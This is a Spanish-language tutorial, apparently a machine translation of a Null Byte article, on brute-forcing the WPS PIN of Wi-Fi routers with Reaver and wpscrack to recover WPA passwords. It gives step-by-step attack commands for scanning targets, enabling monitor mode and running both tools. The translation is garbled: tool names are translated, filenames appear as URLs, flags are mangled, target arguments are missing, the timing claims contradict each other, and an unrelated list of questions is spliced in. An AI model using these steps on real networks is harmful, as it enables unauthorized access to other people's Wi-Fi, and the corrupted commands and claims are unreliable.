Una falla en WPS , o en la configuración protegida por Wi-Fi, conocida por TNS desde hace más de un año, fue finalmente explotada con un código de prueba de concepto. Tanto TNS, los descubridores del exploit como Stefan en .braindump han creado sus respectivos programas “reaver” y “wpscrack” para explotar la vulnerabilidad WPS. A partir de este exploit, la contraseña de WPA se puede recuperar casi instantáneamente en texto sin formato una vez que se inicia el ataque al punto de acceso WPS, que normalmente demora de 2 a 10 horas (dependiendo del programa que utilice).
Este exploit derrota a WPS a través de un ataque inteligente de fuerza bruta al PIN estático de WPS. Al adivinar el PIN, el enrutador realmente arrojará, independientemente de si los primeros cuatro dígitos (de ocho) son correctos o no. Entonces, el número final es un número de verificación utilizado para satisfacer un algoritmo. Esto puede explotarse para forzar la fuerza bruta del PIN de WPS y permitir la recuperación de la contraseña de WPA en un tiempo increíblemente corto, a diferencia del ataque estándar en WPA.
En este Byte Nulo, veamos cómo usar ambas herramientas para descifrar WPS. Hasta el momento, ningún enrutador está a salvo de este ataque, y ninguno de los proveedores ha reaccionado y lanzado firmware con mitigaciones. Incluso deshabilitar WPS todavía permite este ataque en la mayoría de los enrutadores.
- ¿Se pueden piratear los monitores de bebés sin Wi-Fi y apagar sus cámaras de forma remota?
- Cómo compartir mi internet a través de WiFi a un alcance de 200 ma la forma más barata
- ¿Es posible que alguien piratee mi computadora portátil o móvil usando mi wifi, y alguien puede piratear mi wifi protegido con contraseña?
- ¿Es realmente posible hackear un wifi? ¿Si es así, entonces cómo?
- ¿Qué debo hacer para obtener una mejor señal de Wi-Fi? Solo tengo un dispositivo de punto de acceso móvil y una tableta.
Requisitos
Raspberry Pi. Imagen de SADMIN / Null Byte
- Una computadora (o máquina virtual) que ejecuta el sistema operativo Kali Linux. Si eres un principiante, puedes comenzar con nuestra compilación Kali Pi basada en la Raspberry Pi de $ 35. que veremos en detalle aquí:
Un enrutador en casa con WPS
- Un adaptador de red inalámbrico capaz de monitorizar e inyectar paquetes. adaptadores de gama para principiantes.
- Los siguientes programas instalados (instalar por nombre de paquete): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
SADMIN / Byte nulo
Herramientas
- Reaver (soporte para todos los enrutadores)
- wpscrack (más rápido, pero solo compatible con las principales marcas de enrutadores)
Crack WPS
El texto en negrita es un comando de terminal.
Siga la guía que corresponde a la herramienta que eligió usar a continuación.
Saqueador
- Descomprimir Reaver.
- descomprimir reaver-1.3.tar.gz
- Cambie al directorio Reaver.
- cd reaver-1.3
- Configurar, compilar e instalar la aplicación.
- ./configure && make && sudo make install
- Busque un punto de acceso para atacar y copie su dirección MAC para más tarde (XX: XX: XX: XX: XX: XX).
- sudo iwlist scan wlan0
- Configure su dispositivo en modo monitor.
- sudo airmon-ng start wlan0
- Ejecute la herramienta contra un punto de acceso.
- reaver -i mon0 -b -vv
- Espera hasta que termine.
Esta herramienta lo hace demasiado fácil.
http://wpscrack.py
- Haz del programa un ejecutable.
- chmod + x http://wpscrack.py
- Busque un punto de acceso para atacar y copie su dirección MAC para más tarde (XX: XX: XX: XX: XX: XX).
- sudo iwlist scan wlan0
- Obtenga su dirección MAC, guárdela para más tarde.
- ip link show wlan0 | awk ‘/ ether / {print $ 2}’
- Configure su dispositivo en modo monitor.
- sudo airmon-ng start wlan0
- Ataca tu AP.
- http://wpscrack.py –face mon0 –client –bssid –ssid -v
- A la espera de la victoria.
Ahora, esperemos que veamos mucha acción de actualización de firmware en el futuro cercano, o de lo contrario, muchos lugares están en un mundo de problemas.